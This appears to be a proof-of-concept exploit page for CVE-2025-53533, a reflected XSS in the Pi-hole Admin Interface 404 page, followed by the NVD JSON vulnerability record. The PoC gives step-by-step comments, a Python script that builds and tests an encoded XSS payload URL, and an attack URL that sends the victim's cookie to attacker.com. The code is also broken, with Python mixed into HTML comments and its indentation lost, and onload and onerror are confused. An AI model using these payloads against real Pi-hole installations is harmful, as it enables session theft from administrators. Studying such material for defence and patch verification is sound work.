CVE-2025-53533

<!-- CVE-2025-53533 PoC: Reflected XSS in Pi-hole Admin Interface 404 page --> <!-- Attack vector: Malformed URL path with onload attribute injection --> <!-- Target: Pi-hole Admin Interface <= 6.2.1 --> <!-- Step 1: Craft the malicious URL --> <!-- The payload injects an onload attribute into the body tag class via 404 page --> <!-- URL encode the payload to bypass potential filters --> <!-- Example malicious URL (URL decoded for readability): --> <!-- https://vulnerable-pihole.com/<img src=x onerror=alert(document.domain)> --> <!-- Step 2: Send the crafted URL to the victim --> <!-- When victim visits the link, the following happens: --> <!-- 1. Server returns 404 page --> <!-- 2. The requested path is placed in body class attribute --> <!-- 3. Browser parses the HTML and executes the onload/onerror handler --> <!-- Python PoC script --> import urllib.parse import requests def generate_poc(target_url): """Generate CVE-2025-53533 exploit URL""" # XSS payload - will be placed in body class attribute xss_payload = '<img src=x onerror=alert(document.cookie)>' # URL encode the payload encoded_payload = urllib.parse.quote(xss_payload) # Construct the malicious URL malicious_url = f"{target_url.rstrip('/')}/{encoded_payload}" return malicious_url def test_vulnerability(target_url): """Test if the target is vulnerable""" poc_url = generate_poc(target_url) print(f"[*] Testing CVE-2025-53533 on: {target_url}") print(f"[*] Malicious URL: {poc_url}") try: response = requests.get(poc_url, timeout=10) if response.status_code == 404: # Check if payload is reflected in body class if '<img src=x onerror=alert' in response.text: print("[!] VULNERABLE: XSS payload reflected in 404 page") return True else: print("[-] Possibly patched or filtered") return False else: print(f"[*] Unexpected status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": target = "https://pi-hole-admin.example.com" test_vulnerability(target) <!-- Real-world attack scenario: --> <!-- Attacker sends this link to victim via email, chat, etc. --> <!-- https://192.168.1.1/admin/<img src=x onload=fetch('https://attacker.com/steal?c='+document.cookie)> <!-- Victim clicks link -> XSS executes -> Cookie stolen -->

{"cve": {"id": "CVE-2025-53533", "sourceIdentifier": "[email protected]", "published": "2025-10-27T19:16:04.003", "lastModified": "2025-12-18T16:23:06.350", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Pi-hole Admin Interface is a web interface for managing Pi-hole, a network-level advertisement and internet tracker blocking application. Pi-hole Admin Interface versions 6.2.1 and earlier are vulnerable to reflected cross-site scripting (XSS) via a malformed URL path. The 404 error page includes the requested path in the class attribute of the body tag without proper sanitization or escaping. An attacker can craft a URL containing an onload attribute that will execute arbitrary JavaScript code in the browser when a victim visits the malicious link. If an attacker sends a crafted pi-hole link to a victim and the victim visits it, attacker-controlled JavaScript code is executed in the browser of the victim. This has been patched in version 6.3."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pi-hole:web_interface:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.3", "matchCriteriaId": "D3BA34FE-9D93-4877-85D7-B0C15D1C11A9"}]}]}], "references": [{"url": "https://github.com/pi-hole/web/security/advisories/GHSA-w8f8-92rx-4f6w", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}